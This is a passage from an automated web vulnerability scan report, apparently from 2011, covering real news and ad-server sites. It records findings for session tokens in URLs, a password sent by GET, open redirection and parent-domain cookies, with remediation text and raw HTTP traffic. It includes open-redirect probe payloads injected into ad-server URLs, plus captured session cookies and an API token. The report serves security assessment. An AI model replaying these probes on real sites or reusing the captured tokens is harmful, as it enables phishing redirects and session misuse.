Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<!--//include 8 //-->
           

<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...

7.9. http://www.quantcast.com/p-352ZWwG8I7OVQ

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-352ZWwG8I7OVQ

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /p-352ZWwG8I7OVQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<p>
Maybe you should try <a href="/hulu.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">hulu.com</a>, <a href="/gawker.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">gawker.com</a> or <a href="/evite.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">evite.com</a>
...[SNIP]...

8. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

9. Open redirection
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


9.1. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ab5c05f8be0257f29/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http%3a//ab5c05f8be0257f29/a%3fhttp%3a/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:43 GMT;
Content-Type: text/html
Location: http://ab5c05f8be0257f29/a?http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

9.2. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:26 GMT;
Content-Type: text/html
Location: http://a15c68dbdb35dc3b6/a?http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

9.3. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ad97bba2a29a29e53/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http%3a//ad97bba2a29a29e53/a%3fhttp%3a/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:41 GMT;
Content-Type: text/html
Location: http://ad97bba2a29a29e53/a?http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10. Cookie scoped to parent domain
There are 143 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:48 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223848"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 95223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.2. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:49 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223849"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 102098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.4. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:51 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.5. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.6. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.7. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

